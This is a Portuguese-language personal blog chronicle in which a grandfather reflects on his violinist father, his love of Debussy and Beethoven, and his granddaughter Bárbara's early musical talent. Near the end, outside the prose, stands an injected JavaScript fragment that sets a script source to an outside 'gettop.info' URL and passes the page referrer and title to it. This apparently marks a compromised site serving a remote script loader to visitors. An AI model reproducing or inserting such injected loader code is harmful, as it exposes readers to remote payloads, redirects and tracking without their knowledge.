Ouvindo Beethoven…

Com base na Lei da Hereditariedade, do cientista austríaco Gregor Mendel, considerado o “pai” da genética, segundo a qual os genitores transmitem seus talentos aos descendentes, certemente não herdei os dotes de meu pai, que era excelente violinista e gostava de interpretar a melódica “Claire de Lune” (o Luar), de Claude Debussy, aliás uma das minhas tantas músicas preferidas e que me arranca lágrimas de emoção.

Por mera coincidência, numa competição internacional sobre as dez composições clássicas mais bonitas do mundo, o compositor francês ganhou disparado, sobrepujando até mesmo o “Noturno”, do polonês  Fréderic Chopin.

Para atenuar a frustração de um desafinado assumido (eu), e que é absolutamente apaixonado por música – seja erudita, sacra ou, principalmente, MPB (Música Popular Brasileira), acredito que os gens de meu pai, em compensação, se refletem em minha netinha Bárbara, hoje com 11 anos de idade, mas que desde muito cedo revelou seu talento musical, a exemplo da feliz temporada quando estudou piano com a saudosa professora Rosária, mestra conhecidíssima em Brasília.

Com uma voz afinadíssima, enriquecida por um timbre peculiar, a Babá (como a chamamos, carinhosamente, aqui em casa) não só gosta de cantar, mas também se acompanha ao piano ou ao violão, nas canções que ela mesma compõe (música e letra) com uma facilidade incrível, o que me fez lembrar de gênios precoces, como Amadeus Mozart e Ludwig Van Beethoven, que começaram a produzir peças musicais desde a infância, assombrando plateias de todo o mundo.

Por citar Beethoven, fiquei também assombrado, de boca aberta, quando surpreendi recentemente minha netinha ouvindo, embevecida, a Quinta Sinfonia do gênio nascido em Bonn, na Alemanha, que perdeu a audição aos 26 anos, mas, milagrosamente, continuou compondo maravilhas para os milhões de fãs que têm ouvidos de ouvir. A propósito, guardem este nome de uma autêntica artista: Bárbara Saito Sampaio Pinto.

Posso garantir que não se trata de opinião de um vovô-coruja. O futuro confirmará!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário